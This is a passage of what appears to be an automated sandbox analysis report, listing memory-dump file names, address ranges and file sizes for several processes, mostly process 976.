                            • memory/976-222-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-223-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-224-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-187-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-226-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-230-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-211-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-189-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-188-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-231-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-232-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-233-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-234-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-235-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-236-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-237-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-238-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-239-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-240-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-241-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-242-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-243-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-244-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-245-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-246-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-247-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-248-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-249-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-250-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-251-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/1048-817-0x0000000000000000-mapping.dmp

                            • memory/1248-1416-0x0000000000000000-mapping.dmp

                            • memory/1396-528-0x0000000000000000-mapping.dmp

                            • memory/2260-273-0x0000000000000000-mapping.dmp

                            • memory/2656-907-0x0000000000000000-mapping.dmp

                            • memory/3736-117-0x0000000000000000-mapping.dmp

                            • memory/3908-371-0x0000000000000000-mapping.dmp

                            • memory/4044-924-0x0000000000000000-mapping.dmp

                            • memory/4280-179-0x0000000000000000-mapping.dmp

                            • memory/4280-225-0x00000236BD970000-0x00000236BD9FA000-memory.dmp

                              Filesize

                              552KB

                            • memory/4376-674-0x0000000000000000-mapping.dmp

                            • memory/4732-118-0x0000000000000000-mapping.dmp

                            • memory/4732-162-0x00000188ED410000-0x00000188ED422000-memory.dmp

                              Filesize

                              72KB

                            • memory/4732-130-0x00000188ED440000-0x00000188ED4B6000-memory.dmp

                              Filesize

                              472KB

                            • memory/4732-124-0x00000188ED290000-0x00000188ED2B2000-memory.dmp

                              Filesize

                              136KB

                            • memory/4732-175-0x00000188ED400000-0x00000188ED40A000-memory.dmp

                              Filesize

                              40KB

                            • memory/4860-645-0x0000000000000000-mapping.dmp

                            • memory/4932-934-0x0000000000000000-mapping.dmp

                            • memory/5112-1325-0x0000000000000000-mapping.dmp

                            • memory/5116-979-0x0000000000000000-mapping.dmp